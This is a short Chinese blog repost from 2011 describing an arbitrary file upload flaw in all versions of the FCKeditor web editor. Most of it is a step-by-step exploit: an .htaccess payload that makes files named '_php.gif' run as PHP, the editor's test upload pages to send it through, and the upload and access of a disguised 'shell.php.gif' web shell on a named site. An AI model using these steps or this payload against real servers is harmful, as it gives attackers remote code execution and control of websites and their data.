FCKeditor编辑器全部版本另类上传漏洞(转)

转自Fans内二货的博客,源地址:http://honglousy.blog.sohu.com/182654619.html

FCKeditor all versian Arbitrary File Upload Vulnerability
发布时间: 2011
源码地址:http://sourceforge.net/projects/fckeditor/
漏洞作者: pentesters.ir
利用步骤:
1.创建一个htaccess文件:
代码内容:
<FilesMatch “_php.gif”>
SetHandler application/x-httpd-php
</FilesMatch>

2.实用编辑器上传htaccess文件.

http://www.badguest.cn/FCKeditor/editor/filemanager/upload/test.html

http://www.badguest.cn/FCKeditor/editor/filemanager/browser/default/connectors/test.html

3.上传shell.php.gif
4.上传后shell.php.gif, 会自动被改名为 shell_php.gif
5.访问http://www.badguest.cn/上传目录/shell_php.gif

 

本文固定链接: https://www.unhonker.com/technical/119.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2011年08月27日发表在 技术文章 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: FCKeditor编辑器全部版本另类上传漏洞(转) | 90' s Blog|关注网络信息安全

FCKeditor编辑器全部版本另类上传漏洞(转):等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!